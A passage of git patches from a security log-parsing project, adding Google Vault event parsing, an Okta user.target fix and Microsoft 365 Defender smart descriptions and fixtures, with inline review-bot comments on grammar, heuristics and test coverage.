Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -65,6 +65,28 @@ } ] }, + { + "value": "User {user.email} view the document {file.name} in {network.application}", + "conditions": [ + { + "field": "event.category", + "value": "file" + }, + { + "field": "event.type", + "value": "access" + }, + { + "field": "user.email" + }, + { + "field": "file.name" + }, + { + "field": "network.application" + } + ] + }, { "value": "User {user.email} give access to {client.user.id} for {google.report.token.app_name} application", "conditions": [ 
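Review bot: The template reinserted here keeps `User {user.email} view the document {file.name} in {network.application}`, which is a grammatical slip; `User {user.email} viewed the document {file.name} in {network.application}` matches the past-tense phrasing of an event summary. If the list is evaluated in order, moving this entry ahead of the `give access` entry also changes which description wins when both match, so the reason for the move belongs in the commit description.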
@@ -132,24 +154,17 @@ ] }, { - "value": "User {user.email} view the document {file.name} in {network.application}", + "value": "User {user.email} have {event.action} on {network.application} application", "conditions": [ { - "field": "event.category", - "value": "file" - }, - { - "field": "event.type", - "value": "access" + "field": "network.application", + "value": "vault" }, { "field": "user.email" }, { - "field": "file.name" - }, - { - "field": "network.application" + "field": "event.action" } ] }, diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 1a14d7a07..363bfd6b5 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -26,6 +26,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "calendar"}}' - name: set_admin_fields filter: '{{ json_event.message.id.applicationName == "admin"}}' + - name: set_vault_fields + filter: '{{ json_event.message.id.applicationName == "vault"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' @@ -238,3 +240,21 @@ stages: event.type: ["change"] google.report.parameters.name: "{{json_event.message.events[0].parameters[0].name}}" google.report.parameters.value: "{{json_event.message.events[0].parameters[0].value}}" + + set_vault_fields: + actions: + - set: + event.type: > + {% set types = [] %} + {% for event in json_event.message.events %} + {%- if ("delete" in event.name) or ("remove" in event.name) -%} + {% set _ = types.append("deletion") %} + {%- elif ("create" in event.name) -%} + {% set _ = types.append("creation") %} + {%- elif ("view" in event.name) -%} + {% set _ = types.append("access") %} + {%- else -%} + {% set _ = types.append("change") %} + {%- endif -%} + {% endfor %} + {{ types|unique|list }} \ No newline at end of file 
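Review bot: The new vault template `User {user.email} have {event.action} on {network.application} application` is ungrammatical and interpolates the raw action name (the fixture added in this commit renders it as `view_cross_matter_litigation_hold_report`), so the summary reads awkwardly; `User {user.email} performed {event.action} on {network.application}` avoids both problems without changing the conditions. The condition set (network.application fixed to `vault`, plus user.email and event.action) is fine as a fallback for Vault events that no more specific entry covers.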
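Review bot: The `set_vault_fields` classification matches bare substrings (`"delete" in event.name`, `"remove"`, `"create"`, `"view"`) in a fixed order, so any Vault action name that happens to contain one of these words — or two of them — is silently bucketed by the first matching branch; a comment stating the heuristic, `# event.type is derived from keywords in the Vault action name; first match wins`, plus a fixture whose name is not a plain view/create/delete would make the intent checkable. The template also mixes `{% … %}` and `{%- … -%}` trim markers; if the rendered value is parsed back into a list the stray whitespace is harmless, but using `{%- -%}` consistently, as the `if` branches already do, keeps the output tidy. The loop iterates `json_event.message.events` without a guard; other stages index `events[0]` directly, so presumably the list is always present for this application.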
diff --git a/Google Cloud/google-report/tests/test_vault_service.json b/Google Cloud/google-report/tests/test_vault_service.json
new file mode 100644
index 000000000..cfe26e3f4
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_vault_service.json
@@ -0,0 +1,48 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-10-24T12:15:09.887Z\",\"uniqueQualifier\":\"38392508037850000000\",\"applicationName\":\"vault\",\"customerId\":\"C020000000\"},\"etag\":\"\\\"v9u8pSCZPl3C66fdSWYRyXweF216RQ7SWqFaenjlgO0/aMkDQ5g3000000000000000000000\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"joe.done@test.cloud\",\"profileId\":\"10055276727227777777777\"},\"events\":[{\"type\":\"user_action\",\"name\":\"view_cross_matter_litigation_hold_report\"}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-10-24T12:15:09.887Z\",\"uniqueQualifier\":\"38392508037850000000\",\"applicationName\":\"vault\",\"customerId\":\"C020000000\"},\"etag\":\"\\\"v9u8pSCZPl3C66fdSWYRyXweF216RQ7SWqFaenjlgO0/aMkDQ5g3000000000000000000000\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"joe.done@test.cloud\",\"profileId\":\"10055276727227777777777\"},\"events\":[{\"type\":\"user_action\",\"name\":\"view_cross_matter_litigation_hold_report\"}]}", + "event": { + "action": "view_cross_matter_litigation_hold_report", + "dataset": "admin#reports#activity", + "type": [ + "access" + ] + }, + "@timestamp": "2024-10-24T12:15:09.887000Z", + "cloud": { + "account": { + "id": "C020000000" + } + }, + "google": { + "report": { + "actor": { + "email": "joe.done@test.cloud" + } + } + }, + "network": { + "application": "vault" + }, + "related": { + "user": [ + "joe.done" + ] + }, + "user": { + "domain": "test.cloud", + "email": "joe.done@test.cloud", + "id": "10055276727227777777777", + "name": "joe.done" + } + } +} \ No newline at end of file From 6377e1bb11d4ce4ce5496e13b9682eaa8dff2ab2 Mon Sep 17 00:00:00 2001 
From: TOUFIKI Zakarya Date: Fri, 25 Oct 2024 12:15:23 +0200 Subject: [PATCH 168/317] Apply linter --- Google Cloud/google-report/tests/test_vault_service.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Google Cloud/google-report/tests/test_vault_service.json b/Google Cloud/google-report/tests/test_vault_service.json index cfe26e3f4..1c9dab4ca 100644 --- a/Google Cloud/google-report/tests/test_vault_service.json +++ b/Google Cloud/google-report/tests/test_vault_service.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-10-24T12:15:09.887Z\",\"uniqueQualifier\":\"38392508037850000000\",\"applicationName\":\"vault\",\"customerId\":\"C020000000\"},\"etag\":\"\\\"v9u8pSCZPl3C66fdSWYRyXweF216RQ7SWqFaenjlgO0/aMkDQ5g3000000000000000000000\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"joe.done@test.cloud\",\"profileId\":\"10055276727227777777777\"},\"events\":[{\"type\":\"user_action\",\"name\":\"view_cross_matter_litigation_hold_report\"}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-10-24T12:15:09.887Z\",\"uniqueQualifier\":\"38392508037850000000\",\"applicationName\":\"vault\",\"customerId\":\"C020000000\"},\"etag\":\"\\\"v9u8pSCZPl3C66fdSWYRyXweF216RQ7SWqFaenjlgO0/aMkDQ5g3000000000000000000000\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"joe.done@test.cloud\",\"profileId\":\"10055276727227777777777\"},\"events\":[{\"type\":\"user_action\",\"name\":\"view_cross_matter_litigation_hold_report\"}]}" + } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-10-24T12:15:09.887Z\",\"uniqueQualifier\":\"38392508037850000000\",\"applicationName\":\"vault\",\"customerId\":\"C020000000\"},\"etag\":\"\\\"v9u8pSCZPl3C66fdSWYRyXweF216RQ7SWqFaenjlgO0/aMkDQ5g3000000000000000000000\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"joe.done@test.cloud\",\"profileId\":\"10055276727227777777777\"},\"events\":[{\"type\":\"user_action\",\"name\":\"view_cross_matter_litigation_hold_report\"}]}", From 38fed737300edb69601eb0e28afb3a1fc1f6450d Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 25 Oct 2024 12:18:35 +0200 Subject: [PATCH 169/317] apply prettier --- Google Cloud/google-report/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 363bfd6b5..bd5fd0d4e 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -257,4 +257,4 @@ stages: {% set _ = types.append("change") %} {%- endif -%} {% endfor %} - {{ types|unique|list }} \ No newline at end of file + {{ types|unique|list }} From 962bc3bf7ff72e0de17f46e5c9143caf83a91d1a Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 28 Oct 2024 09:50:22 +0100 Subject: [PATCH 170/317] fix(Okta): fix user.target --- Okta/okta-system-logs/ingest/parser.yml | 2 +- .../tests/test_auth_via_idp.json | 16 +++++++++++----- .../tests/test_auth_via_mfa.json | 8 +++++++- .../tests/test_authentication_sso.json | 8 +++++++- .../tests/test_authentication_sso_failure.json | 8 +++++++- .../okta-system-logs/tests/test_send_factor.json | 8 +++++++- Okta/okta-system-logs/tests/test_target.json | 10 ++++++++-- .../tests/test_update_account.json | 8 +++++++- 8 files changed, 55 insertions(+), 13 deletions(-) diff --git a/Okta/okta-system-logs/ingest/parser.yml b/Okta/okta-system-logs/ingest/parser.yml index a764a139a..377fde09e 100644 --- a/Okta/okta-system-logs/ingest/parser.yml +++ b/Okta/okta-system-logs/ingest/parser.yml @@ -37,7 +37,7 @@ stages: user.full_name: "{{parsed_event.message.actor.displayName}}" filter: '{{parsed_event.message.get("actor") != None}}' - set: - user: > + user.target: > {% for target in parsed_event.message.target if target.get("type") in ["AppUser", "User"] %} {%- if loop.first %}{ "id": "{{target.id}}", diff --git a/Okta/okta-system-logs/tests/test_auth_via_idp.json b/Okta/okta-system-logs/tests/test_auth_via_idp.json index 9df9dda5f..7852462a5 100644 --- a/Okta/okta-system-logs/tests/test_auth_via_idp.json +++ b/Okta/okta-system-logs/tests/test_auth_via_idp.json @@ -61,7 +61,7 @@ "1.2.3.4" ], "user": [ - "john.doe@example.org" + "system@okta.com" ] }, "source": { 
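Review bot: Renaming the set target from `user` to `user.target` stops the target from overwriting the actor, but the fixture update in `Okta/okta-system-logs/tests/test_auth_via_idp.json` (`@@ -61,7`) shows a side effect: `related.user` now lists only the actor (`system@okta.com`) and the targeted account `john.doe@example.org` drops out, so a search on related.user for the affected user no longer hits this event. If related.user is derived from `user.name` elsewhere in the parser, consider also appending `user.target.name` to it. The target object is built by interpolating values into a JSON literal (`"id": "{{target.id}}",`), so a target value containing a double quote would break the rendered JSON unless the pipeline escapes it — worth confirming. The `set` block that builds the object continues outside the hunk.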
@@ -87,10 +87,16 @@
 "top_level_domain": "org"
 },
 "user": {
- "email": "john.doe@example.org",
- "full_name": "John Doe",
- "id": "eWiaLPtSTpjyy1BIwNFXg",
- "name": "john.doe@example.org"
+ "email": "system@okta.com",
+ "full_name": "Okta System",
+ "id": "2pHxMaUZr2yoej9R2Lsf4",
+ "name": "system@okta.com",
+ "target": {
+ "email": "john.doe@example.org",
+ "full_name": "John Doe",
+ "id": "eWiaLPtSTpjyy1BIwNFXg",
+ "name": "john.doe@example.org"
+ }
 },
 "user_agent": {
 "device": {
diff --git a/Okta/okta-system-logs/tests/test_auth_via_mfa.json b/Okta/okta-system-logs/tests/test_auth_via_mfa.json
index 58faae959..ac62db966 100644
--- a/Okta/okta-system-logs/tests/test_auth_via_mfa.json
+++ b/Okta/okta-system-logs/tests/test_auth_via_mfa.json
@@ -84,7 +84,13 @@
 "email": "john.doe@example.org",
 "full_name": "John Doe",
 "id": "eWiaLPtSTpjyy1BIwNFXg",
- "name": "john.doe@example.org"
+ "name": "john.doe@example.org",
+ "target": {
+ "email": "john.doe@example.org",
+ "full_name": "John Doe",
+ "id": "eWiaLPtSTpjyy1BIwNFXg",
+ "name": "john.doe@example.org"
+ }
 },
 "user_agent": {
 "device": {
diff --git a/Okta/okta-system-logs/tests/test_authentication_sso.json b/Okta/okta-system-logs/tests/test_authentication_sso.json
index 8d7a62d91..2a7237808 100644
--- a/Okta/okta-system-logs/tests/test_authentication_sso.json
+++ b/Okta/okta-system-logs/tests/test_authentication_sso.json
@@ -83,7 +83,13 @@
 "email": "john.doe@example.org",
 "full_name": "John Doe",
 "id": "eWiaLPtSTpjyy1BIwNFXg",
- "name": "john.doe@example.org"
+ "name": "john.doe@example.org",
+ "target": {
+ "email": "john.doe@example.org",
+ "full_name": "John Doe",
+ "id": "eWiaLPtSTpjyy1BIwNFXg",
+ "name": "john.doe@example.org"
+ }
 },
 "user_agent": {
 "device": {
diff --git a/Okta/okta-system-logs/tests/test_authentication_sso_failure.json b/Okta/okta-system-logs/tests/test_authentication_sso_failure.json
index 155c51867..0301b80ce 100644
--- a/Okta/okta-system-logs/tests/test_authentication_sso_failure.json
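Review bot: In the test_auth_via_mfa.json and test_authentication_sso.json hunks the new `user.target` block is byte-identical to the actor's `user` fields (same `email`, `full_name`, `id` and `name`), so these expectations would still pass if `user.target` were mistakenly filled from `actor` instead of `target`; the same applies to the test_authentication_sso_failure.json, test_send_factor.json and test_update_account.json hunks that follow. Only test_auth_via_idp.json and test_target.json actually distinguish the two identities. Consider giving at least one of the remaining fixtures a target whose `id` differs from the actor's, as test_target.json does (`00u42g1huy7jGFsKX697` for the actor versus `0ua42fzx6ndP18frF697` for the target), so the mapping is genuinely asserted.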
+++ b/Okta/okta-system-logs/tests/test_authentication_sso_failure.json
@@ -84,7 +84,13 @@
 "email": "john.doe@example.org",
 "full_name": "John Doe",
 "id": "fWiaLPtSTpjyy1BIwNFXg",
- "name": "john.doe@example.org"
+ "name": "john.doe@example.org",
+ "target": {
+ "email": "john.doe@example.org",
+ "full_name": "John Doe",
+ "id": "fWiaLPtSTpjyy1BIwNFXg",
+ "name": "john.doe@example.org"
+ }
 },
 "user_agent": {
 "device": {
diff --git a/Okta/okta-system-logs/tests/test_send_factor.json b/Okta/okta-system-logs/tests/test_send_factor.json
index 0fcd1fc2a..458ff4d2d 100644
--- a/Okta/okta-system-logs/tests/test_send_factor.json
+++ b/Okta/okta-system-logs/tests/test_send_factor.json
@@ -78,7 +78,13 @@
 "email": "john.doe@example.org",
 "full_name": "John Doe",
 "id": "eWiaLPtSTpjyy1BIwNFXg",
- "name": "john.doe@example.org"
+ "name": "john.doe@example.org",
+ "target": {
+ "email": "john.doe@example.org",
+ "full_name": "John Doe",
+ "id": "eWiaLPtSTpjyy1BIwNFXg",
+ "name": "john.doe@example.org"
+ }
 },
 "user_agent": {
 "device": {
diff --git a/Okta/okta-system-logs/tests/test_target.json b/Okta/okta-system-logs/tests/test_target.json
index eb94b5ec6..34f3e9184 100644
--- a/Okta/okta-system-logs/tests/test_target.json
+++ b/Okta/okta-system-logs/tests/test_target.json
@@ -84,8 +84,14 @@
 "user": {
 "email": "john.doe@example.org",
 "full_name": "John Doe",
- "id": "0ua42fzx6ndP18frF697",
- "name": "john.doe@example.org"
+ "id": "00u42g1huy7jGFsKX697",
+ "name": "john.doe@example.org",
+ "target": {
+ "email": "john.doe@example.org",
+ "full_name": "John Doe",
+ "id": "0ua42fzx6ndP18frF697",
+ "name": "john.doe@example.org"
+ }
 },
 "user_agent": {
 "device": {
diff --git a/Okta/okta-system-logs/tests/test_update_account.json b/Okta/okta-system-logs/tests/test_update_account.json
index 14412c4f3..7a50fde29 100644
--- a/Okta/okta-system-logs/tests/test_update_account.json
+++ b/Okta/okta-system-logs/tests/test_update_account.json
@@ -78,7 +78,13 @@
 "email": "john.doe@example.org",
 "full_name": "John Doe",
 "id": "eWiaLPtSTpjyy1BIwNFXg",
- "name": "john.doe@example.org"
+ "name": "john.doe@example.org",
+ "target": {
+ "email": "john.doe@example.org",
+ "full_name": "John Doe",
+ "id": "eWiaLPtSTpjyy1BIwNFXg",
+ "name": "john.doe@example.org"
+ }
 },
 "user_agent": {
 "device": {
From c09b5530708171e9c4e634417e2360b442a2c5f3 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia
Date: Tue, 29 Oct 2024 07:57:56 +0200
Subject: [PATCH 171/317] Add more smart descriptions
---
 .../_meta/smart-descriptions.json | 21 +++++
 .../tests/test_deivce_events_2.json | 52 ++++++++++++
 .../tests/test_device_process_events_2.json | 82 +++++++++++++++++++
 .../test_devices_events_script_content.json | 52 ++++++++++++
 4 files changed, 207 insertions(+)
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
index b0c711ee5..21e3caf3c 100644
--- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
+++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
@@ -424,5 +424,26 @@
 { "field": "user.name" },
 { "field": "user.full_name" }
 ]
+ },
+ {
+ "value": "Script with hash {file.hash.sha256} ran on {host.name}",
+ "conditions": [
+ { "field": "event.dataset", "value": "device_events" },
+ { "field": "action.type", "value": "ScriptContent" }
+ ]
+ },
+ {
+ "value": "{file.name} executed on {host.name}",
+ "conditions": [
+ { "field": "event.dataset", "value": "device_process_events" },
+ { "field": "action.type", "value": "ProcessCreated" }
+ ],
+ "relationships": [
+ {
+ "source": "file.name",
+ "target": "host.name",
+ "type": "was executed on"
+ }
+ ]
 }
 ]
diff --git a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json b/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json
new file mode 100644
index 000000000..1f1351d52
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json
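Review bot: The new ScriptContent entry declares no `relationships`, while the ProcessCreated entry added right below it links `file.name` to `host.name` with `was executed on`; if relationships feed entity linking in the UI, the script event should presumably carry the analogous `{ "source": "file.hash.sha256", "target": "host.name", "type": "was executed on" }` so script executions are tied to the host the same way process creations are. Describing the script by hash rather than name is consistent with the fixture in this commit, where the ScriptContent event has `FileName: null` and only `SHA256` set, so the hash is the only stable identifier available for that action type.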
@@ -0,0 +1,52 @@ +{ + "input": { + "message": "{\"time\": \"2024-10-22T15:10:29.9681180Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:09:20.5220737Z\", \"properties\": {\"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"DeviceName\": \"computer.intranet.example\", \"ReportId\": 65306, \"InitiatingProcessId\": 417271, \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:08.62407Z\", \"InitiatingProcessCommandLine\": null, \"InitiatingProcessParentFileName\": null, \"InitiatingProcessParentId\": 0, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessSHA1\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": null, \"InitiatingProcessFolderPath\": null, \"InitiatingProcessAccountName\": null, \"InitiatingProcessAccountDomain\": null, \"SHA1\": null, \"MD5\": null, \"FileName\": null, \"FolderPath\": null, \"AccountName\": null, \"AccountDomain\": null, \"AdditionalFields\": \"{\\\"ScriptContent\\\":\\\"# sudo python3 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo python2 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist 
/log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo rm /opt/microsoft/mdatp/resources/cache/log4j_handlersV2.json \\\\n\\\\nfrom genericpath import isdir\\\\nimport os\\\\nimport re\\\\nimport sys\\\\nimport json\\\\nfrom datetime import datetime as dt\\\\nimport zipfile\\\\nimport string\\\\nimport argparse\\\\nimport traceback\\\\nimport functools\\\\nimport itertools\\\\nimport subprocess as sb\\\\n\\\\nMAX_FILE_SIZE = 1024 * 1024 # 1MB\\\\nMANIFEST_OLD_PATH = \\\\\\\"META-INF/MANIFEST.MF\\\\\\\"\\\\n\\\\ndef take(n, l):\\\\n for i, item in enumerate(l):\\\\n if i > n:\\\\n break\\\\n yield item\\\\n\\\\nclass Jar:\\\\n def __init__(self, path):\\\\n self.path = path\\\\n self._manifest = {}\\\\n self._dirlist = []\\\\n\\\\n def _parse_manifest(self, lines):\\\\n version_indication = \\\\\\\"version=\\\\\\\"\\\\n version_lines = [line for line in lines if line.startswith(version_indication)]\\\\n\\\\n if len(version_lines) > 0:\\\\n version = version_lines[0][len(version_indication):]\\\\n yield 'Version', version.strip()\\\\n\\\\n field_names = ['Specification-Version', 'Specification-Title', 'Specification-Vendor', 'Implementation-Version', 'Implementation-Title', 'Implementation-Vendor']\\\\n for line in lines:\\\\n if any(line.startswith(field_name) for field_name in field_names):\\\\n key, value = line.split(':')\\\\n yield key.strip(), value.strip()\\\\n\\\\n def _open(self):\\\\n if not zipfile.is_zipfile(self.path):\\\\n raise ValueError(\\\\\\\"path is not a zip file: {}\\\\\\\".format(self.path))\\\\n return zipfile.ZipFile(self.path)\\\\n\\\\n def _read_dirlist(self):\\\\n with self._open() as zf:\\\\n filenames = dict(p for p in zf.namelist())\\\\n return [f for f in filenames if any(r.search(f.lower()) for r in args.dirlist)]\\\\n\\\\n\\\\n\\\\n def _get_manifest_path(self, zf):\\\\n for path in [args.manifest_path, MANIFEST_OLD_PATH]:\\\\n if path in zf.namelist():\\\\n return path\\\\n\\\\n def _read_manifest(self, 
throw_on_error=False):\\\\n try:\\\\n with self._open() as zf:\\\\n manifest_path = self._get_manifest_path(zf)\\\\n if not manifest_path:\\\\n # Not found manifest file\\\\n return {}\\\\n\\\\n manifest_info = zf.getinfo(manifest_path)\\\\n if manifest_info.file_size > MAX_FILE_SIZE:\\\\n raise IOError(\\\\\\\"manifest file is too big\\\\\\\")\\\\n\\\\n with zf.open(manifest_path) as f:\\\\n readline_f = functools.partial(f.readline, MAX_FILE_SIZE)\\\\n manifest_lines = list(x.decode().strip() for x in iter(readline_f, b''))\\\\n manifest = self._parse_manifest(manifest_lines)\\\\n return dict((k, v) for k, v in manifest\\\\n if not args.manifest_keys or any(m.search(k.lower()) for m in args.manifest_keys))\\\\n except:\\\\n sys.stderr.write(\\\\\\\"error while reading manifest of '{}': {}\\\\\\\\n\\\\\\\".format(self.path, traceback.format_exc()))\\\\n\\\\n if throw_on_error:\\\\n raise\\\\n\\\\n return {}\\\\n\\\\n def manifest(self, throw_on_error=False):\\\\n if not self._manifest:\\\\n self._manifest = self._read_manifest(throw_on_error)\\\\n return self._\\\"}\", \"InitiatingProcessAccountSid\": null, \"AppGuardContainerId\": null, \"InitiatingProcessSHA256\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"RemoteUrl\": null, \"ProcessCreationTime\": null, \"ProcessTokenElevation\": null, \"ActionType\": \"ScriptContent\", \"FileOriginUrl\": null, \"FileOriginIP\": null, \"InitiatingProcessLogonId\": 0, \"AccountSid\": null, \"RemoteDeviceName\": null, \"RegistryKey\": null, \"RegistryValueName\": null, \"RegistryValueData\": null, \"LogonId\": null, \"LocalIP\": null, \"LocalPort\": null, \"RemoteIP\": null, \"RemotePort\": null, \"ProcessId\": null, \"ProcessCommandLine\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"FileSize\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": 
null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"CreatedProcessSessionId\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-10-22T15:09:08.851712Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}" + }, + "expected": { + "message": "{\"time\": \"2024-10-22T15:10:29.9681180Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:09:20.5220737Z\", \"properties\": {\"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"DeviceName\": \"computer.intranet.example\", \"ReportId\": 65306, \"InitiatingProcessId\": 417271, \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:08.62407Z\", \"InitiatingProcessCommandLine\": null, \"InitiatingProcessParentFileName\": null, \"InitiatingProcessParentId\": 0, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessSHA1\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": null, \"InitiatingProcessFolderPath\": null, \"InitiatingProcessAccountName\": null, \"InitiatingProcessAccountDomain\": null, \"SHA1\": null, \"MD5\": null, \"FileName\": null, \"FolderPath\": null, \"AccountName\": null, \"AccountDomain\": null, \"AdditionalFields\": \"{\\\"ScriptContent\\\":\\\"# sudo python3 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command 
\\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo python2 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo rm /opt/microsoft/mdatp/resources/cache/log4j_handlersV2.json \\\\n\\\\nfrom genericpath import isdir\\\\nimport os\\\\nimport re\\\\nimport sys\\\\nimport json\\\\nfrom datetime import datetime as dt\\\\nimport zipfile\\\\nimport string\\\\nimport argparse\\\\nimport traceback\\\\nimport functools\\\\nimport itertools\\\\nimport subprocess as sb\\\\n\\\\nMAX_FILE_SIZE = 1024 * 1024 # 1MB\\\\nMANIFEST_OLD_PATH = \\\\\\\"META-INF/MANIFEST.MF\\\\\\\"\\\\n\\\\ndef take(n, l):\\\\n for i, item in enumerate(l):\\\\n if i > n:\\\\n break\\\\n yield item\\\\n\\\\nclass Jar:\\\\n def __init__(self, path):\\\\n self.path = path\\\\n self._manifest = {}\\\\n self._dirlist = []\\\\n\\\\n def _parse_manifest(self, lines):\\\\n version_indication = \\\\\\\"version=\\\\\\\"\\\\n version_lines = [line for line in lines if line.startswith(version_indication)]\\\\n\\\\n if len(version_lines) > 0:\\\\n version = version_lines[0][len(version_indication):]\\\\n yield 'Version', version.strip()\\\\n\\\\n field_names = ['Specification-Version', 'Specification-Title', 'Specification-Vendor', 'Implementation-Version', 'Implementation-Title', 'Implementation-Vendor']\\\\n for line in lines:\\\\n if any(line.startswith(field_name) for field_name in 
field_names):\\\\n key, value = line.split(':')\\\\n yield key.strip(), value.strip()\\\\n\\\\n def _open(self):\\\\n if not zipfile.is_zipfile(self.path):\\\\n raise ValueError(\\\\\\\"path is not a zip file: {}\\\\\\\".format(self.path))\\\\n return zipfile.ZipFile(self.path)\\\\n\\\\n def _read_dirlist(self):\\\\n with self._open() as zf:\\\\n filenames = dict(p for p in zf.namelist())\\\\n return [f for f in filenames if any(r.search(f.lower()) for r in args.dirlist)]\\\\n\\\\n\\\\n\\\\n def _get_manifest_path(self, zf):\\\\n for path in [args.manifest_path, MANIFEST_OLD_PATH]:\\\\n if path in zf.namelist():\\\\n return path\\\\n\\\\n def _read_manifest(self, throw_on_error=False):\\\\n try:\\\\n with self._open() as zf:\\\\n manifest_path = self._get_manifest_path(zf)\\\\n if not manifest_path:\\\\n # Not found manifest file\\\\n return {}\\\\n\\\\n manifest_info = zf.getinfo(manifest_path)\\\\n if manifest_info.file_size > MAX_FILE_SIZE:\\\\n raise IOError(\\\\\\\"manifest file is too 